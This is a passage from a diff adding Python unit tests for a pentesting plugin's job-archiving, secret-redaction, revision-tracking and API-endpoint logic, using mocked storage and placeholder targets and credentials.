"example.com", + "start_port": 443, + "end_port": 443, + "run_mode": "SINGLEPASS", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "redact_credentials": True, + "secret_ref": "QmSecretCID", + "official_username": "", + }, + { + "pass_nr": 1, + "date_started": 1, + "date_completed": 2, + "duration": 1, + "aggregated_report_cid": "QmAgg", + "worker_reports": {}, + "risk_score": 0, + }, + {"open_ports": [], "service_info": {}, "web_tests_info": {}}, + {"job_id": "test-job"}, + ] + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertNotIn("secret_ref", archive_dict["job_config"]) + + def test_archive_duration_computed(self): + """duration == date_completed - date_created, not 0.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = 
self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + # date_created=1000000, time()=1000200 → duration=200 + self.assertEqual(archive_dict["duration"], 200.0) + self.assertGreater(archive_dict["duration"], 0) + + def test_stub_has_job_cid_and_config_cid(self): + """After prune, CStore stub has job_cid and job_config_cid.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # Extract the stub written to CStore + hset_call = plugin.chainstore_hset.call_args + stub = hset_call[1]["value"] + self.assertEqual(stub["job_cid"], "QmArchiveCID") + self.assertEqual(stub["job_config_cid"], "QmConfigCID") + self.assertEqual(stub["scan_type"], "webapp") + self.assertEqual(stub["target_url"], "https://example.com/app") + + def test_stub_fields_match_model(self): + """Stub has exactly CStoreJobFinalized fields.""" + from extensions.business.cybersec.red_mesh.models import CStoreJobFinalized + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + stub = plugin.chainstore_hset.call_args[1]["value"] + # Verify it can be loaded into CStoreJobFinalized + finalized = CStoreJobFinalized.from_dict(stub) + self.assertEqual(finalized.job_id, "test-job") + self.assertEqual(finalized.job_status, "FINALIZED") + self.assertEqual(finalized.target, "example.com") + self.assertEqual(finalized.scan_type, "webapp") + self.assertEqual(finalized.target_url, "https://example.com/app") + self.assertEqual(finalized.pass_count, 1) + self.assertEqual(finalized.worker_count, 1) + self.assertEqual(finalized.start_port, 1) + self.assertEqual(finalized.end_port, 1024) + self.assertGreater(finalized.duration, 0) + + def test_pass_report_cids_cleaned_up(self): + """After archive, individual pass CIDs deleted 
from R1FS.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # Check delete_file was called for pass report CID + delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] + self.assertIn("QmPassReport1", delete_calls) + + def test_node_report_cids_preserved(self): + """Worker report CIDs NOT deleted.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] + self.assertNotIn("QmWorker1A", delete_calls) + + def test_aggregated_report_cids_preserved(self): + """aggregated_report_cid per pass NOT deleted.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + delete_calls = [c[0][0] for c in plugin.r1fs.delete_file.call_args_list] + self.assertNotIn("QmAgg1", delete_calls) + + def test_archive_write_failure_no_prune(self): + """R1FS write fails -> CStore untouched, full running state retained.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_write_fail=True) + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + # CStore should NOT have been pruned + plugin.chainstore_hset.assert_not_called() + # pass_reports still present in job_specs + self.assertEqual(len(job_specs["pass_reports"]), 1) + + def test_archive_verify_failure_no_prune(self): + """CID not retrievable -> CStore untouched.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(r1fs_verify_fail=True) + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + plugin.chainstore_hset.assert_not_called() + + def test_archive_verify_retries_before_prune(self): + """Archive verification retries transient 
read-after-write failures before pruning CStore.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + plugin.cfg_archive_verify_retries = 3 + verify_attempts = {"count": 0} + orig_get = plugin.r1fs.get_json.side_effect + + def flaky_get(cid): + if cid == "QmArchiveCID": + verify_attempts["count"] += 1 + if verify_attempts["count"] < 3: + return None + return {"job_id": "test-job"} + return orig_get(cid) + + plugin.r1fs.get_json.side_effect = flaky_get + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + self.assertEqual(verify_attempts["count"], 3) + plugin.chainstore_hset.assert_called_once() + + def test_stuck_recovery(self): + """FINALIZED without job_cid -> _build_job_archive retried via _maybe_finalize_pass.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(job_status="FINALIZED") + # Simulate stuck state: FINALIZED but no job_cid + job_specs["job_status"] = "FINALIZED" + # No job_cid in specs + + plugin.chainstore_hgetall.return_value = {"test-job": job_specs} + plugin._normalize_job_record = MagicMock(return_value=("test-job", job_specs)) + plugin._build_job_archive = MagicMock() + + Plugin._maybe_finalize_pass(plugin) + + plugin._build_job_archive.assert_called_once_with("test-job", job_specs) + + def test_idempotent_rebuild(self): + """Calling _build_job_archive twice doesn't corrupt state.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin() + + Plugin._build_job_archive(plugin, "test-job", job_specs) + first_stub = plugin.chainstore_hset.call_args[1]["value"] + + # Reset and call again (simulating a retry where data is still available) + plugin.chainstore_hset.reset_mock() + plugin.r1fs.add_json.reset_mock() + new_archive_cid = "QmArchiveCID2" + plugin.r1fs.add_json.return_value = new_archive_cid + + # Update get_json to also return data for the new archive CID + orig_side_effect = 
plugin.r1fs.get_json.side_effect + def extended_get(cid): + if cid == new_archive_cid: + return {"job_id": "test-job"} + return orig_side_effect(cid) + plugin.r1fs.get_json.side_effect = extended_get + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + second_stub = plugin.chainstore_hset.call_args[1]["value"] + # Both produce valid stubs + self.assertEqual(first_stub["job_id"], second_stub["job_id"]) + self.assertEqual(first_stub["pass_count"], second_stub["pass_count"]) + + def test_multipass_archive(self): + """Archive with 3 passes contains all pass data.""" + Plugin = self._get_plugin_class() + plugin, job_specs, _, _ = self._build_archive_plugin(pass_count=3, run_mode="CONTINUOUS_MONITORING", job_status="STOPPED") + + Plugin._build_job_archive(plugin, "test-job", job_specs) + + archive_dict = plugin.r1fs.add_json.call_args[0][0] + self.assertEqual(len(archive_dict["passes"]), 3) + self.assertEqual(archive_dict["passes"][0]["pass_nr"], 1) + self.assertEqual(archive_dict["passes"][2]["pass_nr"], 3) + stub = plugin.chainstore_hset.call_args[1]["value"] + self.assertEqual(stub["pass_count"], 3) + self.assertEqual(stub["job_status"], "STOPPED") + + + +class TestPhase5Endpoints(unittest.TestCase): + """Phase 5: API Endpoints.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _build_finalized_stub(self, job_id="test-job"): + """Build a CStoreJobFinalized-shaped dict.""" + return { + "job_id": job_id, + "job_status": "FINALIZED", + "target": "example.com", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "Test", + "risk_score": 42, + "run_mode": "SINGLEPASS", + "duration": 200.0, + "pass_count": 1, + "launcher": 
"launcher-node", + "launcher_alias": "launcher-alias", + "worker_count": 2, + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "date_completed": 1000200.0, + "job_cid": "QmArchiveCID", + "job_config_cid": "QmConfigCID", + } + + def _build_running_job(self, job_id="run-job", pass_count=8): + """Build a running job dict with N pass_reports.""" + pass_reports = [ + {"pass_nr": i, "report_cid": f"QmPass{i}", "risk_score": 10 + i} + for i in range(1, pass_count + 1) + ] + return { + "job_id": job_id, + "job_status": "RUNNING", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "job_pass": pass_count, + "run_mode": "CONTINUOUS_MONITORING", + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "task_name": "Continuous Test", + "start_port": 1, + "end_port": 1024, + "date_created": 1000000.0, + "risk_score": 18, + "job_config_cid": "QmConfigCID", + "workers": { + "worker-A": {"start_port": 1, "end_port": 512, "finished": False}, + "worker-B": {"start_port": 513, "end_port": 1024, "finished": False}, + }, + "timeline": [ + {"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher", "actor_type": "system", "meta": {}}, + {"type": "started", "label": "Started", "date": 1000001.0, "actor": "launcher", "actor_type": "system", "meta": {}}, + ], + "pass_reports": pass_reports, + } + + def _build_plugin(self, jobs_dict): + """Build a mock plugin with given jobs in CStore.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.ee_addr = "launcher-node" + plugin.ee_id = "launcher-alias" + plugin.cfg_instance_id = "test-instance" + plugin.cfg_redmesh_secret_store_key = "unit-test-redmesh-secret-key" + plugin.r1fs = MagicMock() + + plugin.chainstore_hgetall.return_value = dict(jobs_dict) + plugin.chainstore_hget.side_effect = lambda hkey, key: jobs_dict.get(key) + plugin._normalize_job_record = MagicMock( + side_effect=lambda k, v: (k, v) if isinstance(v, dict) and 
v.get("job_id") else (None, None) + ) + + # Bind real methods so endpoint logic executes properly + plugin._get_all_network_jobs = lambda: Plugin._get_all_network_jobs(plugin) + plugin._get_job_from_cstore = lambda job_id: Plugin._get_job_from_cstore(plugin, job_id) + return plugin + + def test_get_job_archive_finalized(self): + """get_job_archive for finalized job returns archive with matching job_id.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + archive_data = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [{"findings": [{"finding_id": "f-1", "title": "Issue"}]}], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + plugin.r1fs.get_json.return_value = archive_data + plugin.chainstore_hgetall.side_effect = [ + {"fin-job": stub}, + {"fin-job:f-1": {"job_id": "fin-job", "finding_id": "f-1", "status": "accepted_risk", "note": "documented"}}, + ] + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["job_id"], "fin-job") + self.assertEqual(result["archive"]["job_id"], "fin-job") + self.assertEqual(result["archive"]["archive_version"], JOB_ARCHIVE_VERSION) + self.assertEqual(result["archive"]["passes"][0]["findings"][0]["triage"]["status"], "accepted_risk") + + def test_get_job_archive_running(self): + """get_job_archive for running job returns not_available error.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=2) + plugin = self._build_plugin({"run-job": running}) + + result = Plugin.get_job_archive(plugin, job_id="run-job") + self.assertEqual(result["error"], "not_available") + + def test_get_job_archive_integrity_mismatch(self): + """Corrupted job_cid pointing to wrong archive is rejected.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = 
self._build_plugin({"fin-job": stub}) + + # Archive has a different job_id + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "other-job", + "passes": [], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["error"], "integrity_mismatch") + + def test_get_job_archive_unsupported_version(self): + """Unsupported archive versions are rejected explicitly.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION + 1, + "job_id": "fin-job", + "passes": [], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["error"], "unsupported_archive_version") + + def test_normalize_job_record_initializes_job_revision(self): + """Legacy records get a normalized integer job_revision.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin._write_job_record = MagicMock(side_effect=lambda job_id, specs, context="": specs) + plugin._delete_job_record = MagicMock() + + normalized_key, normalized = Plugin._normalize_job_record(plugin, "job-1", {"job_id": "job-1", "workers": {}}) + + self.assertEqual(normalized_key, "job-1") + self.assertEqual(normalized["job_revision"], 0) + + def test_write_job_record_bumps_revision(self): + """Centralized job writes bump the revision counter.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.chainstore_hget.side_effect = None + plugin.chainstore_hget.return_value = {"job_id": "job-1", "job_revision": 2} + plugin.chainstore_hset = MagicMock() + plugin._log_audit_event = MagicMock() 
+ plugin.P = MagicMock() + + updated = Plugin._write_job_record(plugin, "job-1", {"job_id": "job-1", "job_revision": 2}, context="test") + + self.assertEqual(updated["job_revision"], 3) + running = CStoreJobRunning.from_dict({ + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "launcher-node", + "launcher_alias": "launcher-alias", + "target": "example.com", + "task_name": "Test", + "start_port": 1, + "end_port": 10, + "date_created": 1.0, + "job_config_cid": "QmConfig", + "workers": {}, + "timeline": [], + "pass_reports": [], + "job_revision": updated["job_revision"], + }) + self.assertEqual(running.job_revision, 3) + plugin._log_audit_event.assert_not_called() + + def test_job_write_guarantees_report_detection_only_mode(self): + """RedMesh exposes detection-only semantics when chainstore lacks CAS.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + + self.assertFalse(Plugin._supports_guarded_job_writes(plugin)) + self.assertEqual(Plugin._get_job_write_guarantees(plugin), { + "mode": "detection_only", + "guarded_writes": False, + "stale_write_detection": True, + "job_revision": True, + }) + + def test_write_job_record_logs_stale_write(self): + """Revision mismatches are logged as stale-write detections.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.chainstore_hget.side_effect = None + plugin.chainstore_hget.return_value = {"job_id": "job-1", "job_revision": 5} + plugin.chainstore_hset = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.P = MagicMock() + + updated = Plugin._write_job_record(plugin, "job-1", {"job_id": "job-1", "job_revision": 3}, context="close_job") + + self.assertEqual(updated["job_revision"], 6) + plugin._log_audit_event.assert_called_once_with("stale_write_detected", { + "job_id": "job-1", + "expected_revision": 3, + "current_revision": 5, + "context": "close_job", + "write_mode": "detection_only", + }) + + def 
test_get_job_config_resolves_secret_ref_for_runtime(self): + """Runtime config loading resolves secret_ref into inline credentials.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.r1fs.get_json.side_effect = [ + { + "scan_type": "webapp", + "target_url": "https://example.com/app", + "secret_ref": "QmSecretCID", + "official_username": "", + "official_password": "", + "regular_username": "", + "regular_password": "", + }, + { + "kind": "redmesh_graybox_credentials", + "payload": { + "official_username": "admin", + "official_password": "secret", + "regular_username": "user", + "regular_password": "pass", + "weak_candidates": ["admin:admin"], + }, + }, + ] + + config = Plugin._get_job_config(plugin, {"job_config_cid": "QmConfigCID"}, resolve_secrets=True) + + self.assertEqual(config["official_username"], "admin") + self.assertEqual(config["official_password"], "secret") + self.assertEqual(config["regular_password"], "pass") + self.assertEqual(config["weak_candidates"], ["admin:admin"]) + self.assertNotIn("secret_ref", config) + self.assertEqual( + plugin.r1fs.get_json.call_args_list[1], + unittest.mock.call("QmSecretCID", secret="unit-test-redmesh-secret-key"), + ) + + def test_get_job_config_resolves_legacy_plaintext_secret_ref_without_key(self): + """Legacy plaintext secret refs remain readable as a compatibility fallback.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.cfg_redmesh_secret_store_key = "" + plugin.cfg_comms_host_key = "" + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 86400, "RETRIES": 2} + plugin.r1fs.get_json.side_effect = [ + { + "scan_type": "webapp", + "target_url": "https://example.com/app", + "secret_ref": "QmSecretCID", + }, + { + "kind": "redmesh_graybox_credentials", + "payload": { + "official_username": "admin", + "official_password": "secret", + }, + }, + ] + + config = Plugin._get_job_config(plugin, {"job_config_cid": 
"QmConfigCID"}, resolve_secrets=True) + + self.assertEqual(config["official_password"], "secret") + self.assertEqual( + plugin.r1fs.get_json.call_args_list[1], + unittest.mock.call("QmSecretCID"), + ) + + def test_get_job_data_running_last_5(self): + """Running job with 8 passes returns last 5 refs only.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=8) + plugin = self._build_plugin({"run-job": running}) + + result = Plugin.get_job_data(plugin, job_id="run-job") + self.assertTrue(result["found"]) + refs = result["job"]["pass_reports"] + self.assertEqual(len(refs), 5) + # Should be the last 5 (pass_nr 4-8) + self.assertEqual(refs[0]["pass_nr"], 4) + self.assertEqual(refs[-1]["pass_nr"], 8) + + def test_get_job_data_finalized_returns_stub(self): + """Finalized job returns stub as-is with job_cid.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + result = Plugin.get_job_data(plugin, job_id="fin-job") + self.assertTrue(result["found"]) + self.assertEqual(result["job"]["job_cid"], "QmArchiveCID") + self.assertEqual(result["job"]["pass_count"], 1) + + def test_list_jobs_finalized_as_is(self): + """Finalized stubs returned unmodified with all CStoreJobFinalized fields.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("fin-job", result) + job = result["fin-job"] + self.assertEqual(job["job_cid"], "QmArchiveCID") + self.assertEqual(job["pass_count"], 1) + self.assertEqual(job["worker_count"], 2) + self.assertEqual(job["risk_score"], 42) + self.assertEqual(job["duration"], 200.0) + self.assertEqual(job["scan_type"], "webapp") + self.assertEqual(job["target_url"], "https://example.com/app") + + def test_list_jobs_running_stripped(self): + """Running jobs have counts but no timeline, workers, or 
pass_reports.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=3) + plugin = self._build_plugin({"run-job": running}) + + result = Plugin.list_network_jobs(plugin) + self.assertIn("run-job", result) + job = result["run-job"] + # Should have counts + self.assertEqual(job["pass_count"], 3) + self.assertEqual(job["worker_count"], 2) + self.assertEqual(job["scan_type"], "webapp") + self.assertEqual(job["target_url"], "https://example.com/app") + # Should NOT have heavy fields + self.assertNotIn("timeline", job) + self.assertNotIn("workers", job) + self.assertNotIn("pass_reports", job) + + def test_get_job_progress_returns_job_status(self): + """get_job_progress surfaces job_status from CStore job specs.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=2) + plugin = self._build_plugin({"run-job": running}) + plugin.chainstore_hgetall.return_value = { + "run-job:worker-A": { + "job_id": "run-job", + "worker_addr": "worker-A", + "pass_nr": running["job_pass"], + "assignment_revision_seen": 1, + "progress": 50, + "phase": "service_probes", + "ports_scanned": 50, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="run-job") + self.assertEqual(result["status"], "RUNNING") + self.assertIn("worker-A", result["workers"]) + self.assertEqual(result["workers"]["worker-A"]["worker_state"], "active") + + def test_get_job_status_does_not_report_completed_when_distributed_job_is_incomplete(self): + """Local completion must not hide an unfinished assigned peer.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + plugin.lst_completed_jobs = ["job-1"] + plugin.completed_jobs_reports = { + "job-1": { + "local-1": {"target": "example.com", "ports_scanned": 
10}, + }, + } + plugin.scan_jobs = {} + plugin._get_job_status = lambda job_id: Plugin._get_job_status(plugin, job_id) + plugin.time.return_value = 100.0 + plugin.chainstore_hget.return_value = { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "target": "example.com", + "workers": { + "worker-A": {"start_port": 1, "end_port": 10, "finished": True, "assignment_revision": 1}, + "worker-B": {"start_port": 11, "end_port": 20, "finished": False, "assignment_revision": 1}, + }, + } + plugin.chainstore_hgetall.side_effect = lambda hkey: ( + { + "job-1:worker-A": { + "job_id": "job-1", + "worker_addr": "worker-A", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 100.0, + "phase": "done", + "ports_scanned": 10, + "ports_total": 10, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + "finished": True, + }, + } if hkey == "test-instance:live" else {"job-1": plugin.chainstore_hget.return_value} + ) + + result = Plugin.get_job_status(plugin, job_id="job-1") + + self.assertEqual(result["status"], "network_tracked") + self.assertEqual(result["workers"]["worker-B"]["worker_state"], "unseen") + + def test_get_job_data_includes_reconciled_workers(self): + """get_job_data includes reconciled worker state for active jobs.""" + Plugin = self._get_plugin_class() + running = self._build_running_job("run-job", pass_count=2) + plugin = self._build_plugin({"run-job": running}) + plugin.time.return_value = 100.0 + plugin.chainstore_hgetall.side_effect = lambda hkey: ( + { + "run-job:worker-A": { + "job_id": "run-job", + "worker_addr": "worker-A", + "pass_nr": running["job_pass"], + "assignment_revision_seen": 1, + "progress": 50, + "phase": "service_probes", + "ports_scanned": 50, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } 
if hkey == "test-instance:live" else {"run-job": running} + ) + + result = Plugin.get_job_data(plugin, job_id="run-job") + + self.assertIn("workers_reconciled", result["job"]) + self.assertEqual(result["job"]["workers_reconciled"]["worker-A"]["worker_state"], "active") + + def test_get_job_archive_not_found(self): + """get_job_archive for non-existent job returns not_found.""" + Plugin = self._get_plugin_class() + plugin = self._build_plugin({}) + + result = Plugin.get_job_archive(plugin, job_id="missing-job") + self.assertEqual(result["error"], "not_found") + + def test_get_job_archive_r1fs_failure(self): + """get_job_archive when R1FS fails returns fetch_failed.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = None + + result = Plugin.get_job_archive(plugin, job_id="fin-job") + self.assertEqual(result["error"], "fetch_failed") + + def test_get_analysis_finalized_reads_archive(self): + """Finalized jobs resolve stored LLM analysis from archive passes after CStore pruning.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [ + { + "pass_nr": 1, + "date_completed": 10.0, + "report_cid": "QmPass1", + "llm_analysis": "Archive-backed analysis", + "quick_summary": "Archive-backed summary", + "worker_reports": {"node-A": {}, "node-B": {}}, + }, + ], + "ui_aggregate": {}, + "job_config": {"target": "10.0.0.1"}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_analysis(plugin, job_id="fin-job") + + self.assertEqual(result["job_id"], "fin-job") + self.assertEqual(result["analysis"], "Archive-backed analysis") + self.assertEqual(result["quick_summary"], "Archive-backed summary") + 
self.assertEqual(result["num_workers"], 2) + self.assertEqual(result["total_passes"], 1) + + def test_get_analysis_finalized_reports_llm_failed_from_archive(self): + """Finalized archive reads surface llm_failed instead of pretending pass history is missing.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [ + { + "pass_nr": 1, + "date_completed": 10.0, + "report_cid": "QmPass1", + "llm_failed": True, + "quick_summary": None, + "worker_reports": {"node-A": {}}, + }, + ], + "ui_aggregate": {}, + "job_config": {"target": "10.0.0.1"}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_analysis(plugin, job_id="fin-job") + + self.assertEqual(result["error"], "No LLM analysis available for this pass") + self.assertTrue(result["llm_failed"]) + self.assertEqual(result["pass_nr"], 1) + + def test_get_analysis_finalized_archive_integrity_error_bubbles_up(self): + """Archive integrity failures should be returned instead of falling back to pruned CStore state.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "other-job", + "passes": [], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_analysis(plugin, job_id="fin-job") + + self.assertEqual(result["error"], "integrity_mismatch") + self.assertEqual(result["job_id"], "fin-job") + + def test_get_job_archive_summary_only(self): + """Summary mode returns bounded pass-history summaries instead of full pass payloads.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + 
plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [ + { + "pass_nr": 1, + "date_started": 1.0, + "date_completed": 2.0, + "duration": 1.0, + "risk_score": 10, + "quick_summary": "pass 1", + "aggregated_report_cid": "QmAgg1", + "worker_reports": {"node-A": {}}, + "findings": [{"finding_id": "f-1"}], + }, + { + "pass_nr": 2, + "date_started": 2.0, + "date_completed": 3.0, + "duration": 1.0, + "risk_score": 12, + "quick_summary": "pass 2", + "aggregated_report_cid": "QmAgg2", + "worker_reports": {"node-A": {}, "node-B": {}}, + "findings": [{"finding_id": "f-2"}, {"finding_id": "f-3"}], + }, + ], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job", summary_only=True, pass_limit=1) + + self.assertEqual(result["archive"]["archive_query"]["returned_passes"], 1) + self.assertTrue(result["archive"]["archive_query"]["summary_only"]) + self.assertEqual(result["archive"]["passes"][0]["findings_count"], 1) + self.assertNotIn("findings", result["archive"]["passes"][0]) + + def test_get_job_archive_paginated_passes(self): + """Archive queries can page pass history without dropping the rest of the archive contract.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [{"pass_nr": 1}, {"pass_nr": 2}, {"pass_nr": 3}], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + + result = Plugin.get_job_archive(plugin, job_id="fin-job", pass_offset=1, pass_limit=1) + + self.assertEqual([p["pass_nr"] for p in result["archive"]["passes"]], [2]) + 
self.assertTrue(result["archive"]["archive_query"]["truncated"]) + + def test_update_finding_triage_persists_mutable_state(self): + """Analyst triage updates stay outside archive storage and append audit history.""" + Plugin = self._get_plugin_class() + stub = self._build_finalized_stub("fin-job") + plugin = self._build_plugin({"fin-job": stub}) + plugin.r1fs.get_json.return_value = { + "archive_version": JOB_ARCHIVE_VERSION, + "job_id": "fin-job", + "passes": [{"findings": [{"finding_id": "f-1", "title": "Issue"}]}], + "ui_aggregate": {}, + "job_config": {}, + "timeline": [], + "duration": 0, + "date_created": 0, + "date_completed": 0, + } + plugin.time.return_value = 123.0 + plugin._log_audit_event = MagicMock() + triage_store = {} + triage_audit_store = {} + + def _chainstore_hget(hkey, key): + if hkey.endswith(":triage"): + return triage_store.get(key) + if hkey.endswith(":triage:audit"): + return triage_audit_store.get(key) + return {"fin-job": stub}.get(key) + + def _chainstore_hgetall(hkey): + if hkey.endswith(":triage"): + return dict(triage_store) + if hkey.endswith(":triage:audit"): + return dict(triage_audit_store) + return {"fin-job": stub} + + def _chainstore_hset(hkey, key, value): + if hkey.endswith(":triage"): + triage_store[key] = value + elif hkey.endswith(":triage:audit"): + triage_audit_store[key] = value + + plugin.chainstore_hget.side_effect = _chainstore_hget + plugin.chainstore_hgetall.side_effect = _chainstore_hgetall + plugin.chainstore_hset.side_effect = _chainstore_hset + + result = Plugin.update_finding_triage( + plugin, + job_id="fin-job", + finding_id="f-1", + status="accepted_risk", + note="Approved by analyst", + actor="alice", + review_at=456.0, + ) + + self.assertEqual(result["triage"]["status"], "accepted_risk") + self.assertEqual(result["audit"][-1]["actor"], "alice") + self.assertEqual(triage_store["fin-job:f-1"]["review_at"], 456.0) + plugin._log_audit_event.assert_called_once() + + def test_get_job_triage_not_found(self): + 
